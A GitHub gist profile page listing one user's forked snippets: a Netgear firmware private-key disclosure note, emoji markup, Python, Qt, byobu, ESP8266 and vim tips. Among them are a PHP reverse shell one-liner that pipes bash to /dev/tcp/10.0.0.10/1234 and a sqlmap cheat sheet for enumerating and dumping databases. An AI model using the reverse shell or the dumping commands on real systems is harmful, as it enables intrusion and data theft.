Skip to content

Instantly share code, notes, and snippets.

View XaviTorello's full-sized avatar

Xavi Torelló XaviTorello

77 followers · 85 following
View GitHub Profile
@XaviTorello
XaviTorello / netgear-private-key-disclosure.md
Created January 22, 2020 00:03 — forked from nstarke/netgear-private-key-disclosure.md
Netgear TLS Private Key Disclosure through Device Firmware Images

Netgear Signed TLS Cert Private Key Disclosure

Overview

There are at least two valid, signed TLS certificates that are bundled with publicly available Netgear device firmware.

These certificates are trusted by browsers on all platforms, but will surely be added to revocation lists shortly.

The firmware images that contained these certificates along with their private keys were publicly available for download through Netgear's support website, without authentication; thus anyone in the world could have retrieved these keys.

@XaviTorello
XaviTorello / netgear-private-key-disclosure.md
Created January 22, 2020 00:03 — forked from nstarke/netgear-private-key-disclosure.md
Netgear TLS Private Key Disclosure through Device Firmware Images

Netgear Signed TLS Cert Private Key Disclosure

Overview

There are at least two valid, signed TLS certificates that are bundled with publicly available Netgear device firmware.

These certificates are trusted by browsers on all platforms, but will surely be added to revocation lists shortly.

The firmware images that contained these certificates along with their private keys were publicly available for download through Netgear's support website, without authentication; thus anyone in the world could have retrieved these keys.

@XaviTorello
XaviTorello / gist:8261bd8e09654297ccb040fc4a69a1f2
Created October 7, 2019 14:52 — forked from rxaviers/gist:7360908
Complete list of github markdown emoji markup

People

:bowtie: :bowtie: 😄 :smile: 😆 :laughing:
😊 :blush: 😃 :smiley: ☺️ :relaxed:
😏 :smirk: 😍 :heart_eyes: 😘 :kissing_heart:
😚 :kissing_closed_eyes: 😳 :flushed: 😌 :relieved:
😆 :satisfied: 😁 :grin: 😉 :wink:
😜 :stuck_out_tongue_winking_eye: 😝 :stuck_out_tongue_closed_eyes: 😀 :grinning:
😗 :kissing: 😙 :kissing_smiling_eyes: 😛 :stuck_out_tongue:
@XaviTorello
XaviTorello / transport.py
Created July 30, 2018 09:47 — forked from chrisguitarguy/transport.py
Python xmlrpc lib Transport that used Requests
# -*- coding: utf-8 -*-
"""
A replacement transport for Python xmlrpc library.
Usage:
>>> import xmlrpclib
>>> from transport import RequestsTransport
>>> s = xmlrpclib.ServerProxy('http://yoursite.com/xmlrpc', transport=RequestsTransport())
>>> s.demo.sayHello()
@XaviTorello
XaviTorello / byobuCommands
Created June 7, 2018 13:40 — forked from jshaw/byobuCommands
Byobu Commands
Byobu Commands
==============
byobu Screen manager
Level 0 Commands (Quick Start)
------------------------------
<F2> Create a new window
@XaviTorello
XaviTorello / test_show_qt5_window.py
Last active April 11, 2018 18:57 — forked from ecarreras/test_show_qt_window.py
QT5 testing script
from PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QHBoxLayout
#from PyQt5.QtCore import SIGNAL
from Koo.Rpc import Rpc
from Koo.Common import Api
from Koo.Common import Localization
Localization.initializeTranslations()
from Koo.Dialogs import WindowService
x = Rpc.session.login('http://admin:admin@localhost:8069', 'test_1519123854')
@XaviTorello
XaviTorello / arduino_flash_esp8266.md
Created December 30, 2017 19:34 — forked from spacehuhn/arduino_flash_esp8266.md
Flash ESP8266 over an Arduino

How to flash your ESP8266 without a USB-Serial adapter but with an Arduino.

First be sure everything is connected correcly:

Arduino ESP82666
TX RX
RX TX
GND GND
GND GPIO-15
@XaviTorello
XaviTorello / shell.php
Created December 17, 2017 03:47 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@XaviTorello
XaviTorello / sqlmap-cheat-sheet.md
Created December 15, 2017 17:19 — forked from jkullick/sqlmap-cheat-sheet.md
SQLMap Cheat Sheet 
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
@XaviTorello
XaviTorello / disable_vim_auto_visual_on_mouse.txt
Created October 20, 2017 07:43 — forked from u0d7i/disable_vim_auto_visual_on_mouse.txt
Disable vim automatic visual mode on mouse select
Disable vim automatic visual mode on mouse select
issue: :set mouse-=a
add to ~/.vimrc: set mouse-=a